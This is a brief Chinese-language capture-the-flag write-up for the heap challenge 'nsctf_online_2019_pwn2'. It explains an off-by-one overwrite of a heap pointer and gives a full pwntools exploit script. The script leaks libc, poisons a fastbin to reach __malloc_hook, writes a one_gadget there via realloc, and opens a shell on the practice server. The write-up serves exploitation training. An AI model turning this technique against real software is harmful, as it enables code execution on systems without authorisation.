nsctf_online_2019_pwn2
查看保护
简单题目
这里有一个off-by-one
在name下面是heap_ptr这个指针
攻击思路:因为update_name可以改heap_ptr的最后一个字节,所以利用好这个字节就可以改heap的地址,题目不难合理利用off-by-one即可,攻击手法可以看z1r0 's blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 28807)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = '6.exit\n'
def add(size):
r.sendlineafter(menu, '1')
r.sendlineafter('Input the size', str(size))
def delete():
r.sendlineafter(menu, '2')
def show():
r.sendlineafter(menu, '3')
def update_name(name):
r.sendlineafter(menu, '4')
r.sendafter('Please input your name', name)
def edit(name):
r.sendlineafter(menu, '5')
r.sendlineafter('Input the note', name)
r.sendlineafter('Please input your name', 'aaaa')
add(0x90)
add(0x10)
update_name(b'a' * 0x30 + b'\x10')
delete()
add(0x20)
update_name(b'a' * 0x30 + b'\x40')
show()
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45226, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
realloc = libc_base + libc.sym['realloc']
add(0x60)
delete()
add(0x70)
update_name(b'a' * 0x30 + b'\x40')
edit(p64(malloc_hook - 0x23))
add(0x60)
add(0x60)
edit(b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 0x10))
add(0x10)
r.interactive()